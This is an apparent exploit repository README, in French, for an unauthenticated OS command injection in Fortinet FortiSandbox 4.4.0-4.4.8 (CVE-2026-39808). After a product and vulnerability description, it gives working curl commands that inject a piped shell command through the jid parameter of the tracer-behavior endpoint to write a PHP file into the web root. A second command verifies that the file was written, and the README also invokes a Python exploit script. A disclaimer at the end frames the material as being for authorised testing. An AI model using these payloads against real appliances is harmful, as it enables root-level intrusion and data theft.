
Fortinet FortiSandbox 4.4.0-4.4.8 - Injection de commandes OS via l'endpoint tracer-behavior
Fortinet FortiSandbox 4.4.0-4.4.8 - Injection de commandes OS via le point de terminaison tracer-behavior
Fortinet FortiSandbox est une solution avancée de protection contre les menaces qui crée des environnements isolés pour analyser les fichiers suspects, les URL et le trafic réseau à la recherche de comportements malveillants. Elle utilise une combinaison d'analyse statique, d'analyse dynamique, d'apprentissage automatique basé sur l'IA et de renseignements sur les menaces provenant de FortiGuard pour détecter les menaces zero-day, les logiciels malveillants furtifs, les ransomwares et les attaques ciblées qui contournent les défenses traditionnelles basées sur les signatures. Les entreprises devraient déployer FortiSandbox pour se protéger contre les menaces émergentes — en particulier les logiciels malveillants inconnus et les menaces persistantes avancées (APT) ; en déclenchant automatiquement l'analyse de contenu suspect dans un environnement sécurisé et isolé avant qu'il n'atteigne les systèmes de production. Il s'intègre au Fortinet Security Fabric et peut être déployé en tant qu'appliance physique, machine virtuelle, service cloud ou solution conteneurisée pour s'adapter à diverses architectures réseau.
CVE-2026-39808 est une vulnérabilité critique d'injection de commandes OS affectant les versions 4.4.0 à 4.4.8 de FortiSandbox. Le défaut provient d'une neutralisation incorrecte des éléments spéciaux dans les entrées contrôlées par l'utilisateur avant leur utilisation dans la construction de commandes OS (CWE-78), affectant spécifiquement un point de terminaison API non spécifié. Un attaquant non authentifié peut exploiter cette vulnérabilité en envoyant des requêtes HTTP spécialement conçues pour exécuter des commandes système arbitraires avec les privilèges root sur le système sous-jacent. Une exploitation réussie donne à l'attaquant un contrôle complet de l'appliance FortiSandbox, lui permettant d'accéder aux échantillons de logiciels malveillants analysés, d'exfiltrer des données de configuration sensibles, de pivoter vers des segments réseau connectés ou d'utiliser l'appareil compromis comme point d'appui pour un déplacement latéral ultérieur au sein de l'entreprise. Cette vulnérabilité est activement exploitée dans la nature.
# Step 1 — inject: write a marker string to a temp .php file via pipe in jid param
# Decoded payload: |(echo canary > /web/ng/proof.php)|
curl -sk -o /dev/null -w "%{http_code}" \
"http://example.com/fortisandbox/job-detail/tracer-behavior?jid=%7c%28echo+canary+%3e+%2fweb%2fng%2fproof.php%29%7c" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Connection: close"
# Step 2 — verify: fetch the dropped file and check for the marker
curl -sk "http://example.com/ng/proof.php" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Connection: close"
python CVE-2026-39808-X7.py
Ce dépôt et son contenu sont fournis strictement pour la recherche en sécurité légitime, les tests d'intrusion autorisés, l'étude éducative et les fins défensives. En accédant ou en utilisant ce matériel, vous reconnaissez l'entière responsabilité de garantir que vos activités sont conformes à toutes les lois applicables et que vous avez obtenu les autorisations appropriées avant de tester ou d'appliquer ces techniques sur un système que vous ne possédez pas.
Les auteurs et mainteneurs de ce projet déclinent toute responsabilité pour tout dommage, conséquence juridique ou mauvaise utilisation résultant de l'application de ces informations. Toute utilisation pour un accès non autorisé, une activité malveillante ou des fins illégales est expressément interdite et non supportée.
Utilisez de manière responsable. Restez dans la légalité. Testez uniquement ce que vous possédez ou pour lequel vous avez une autorisation écrite explicite.
SCT-PL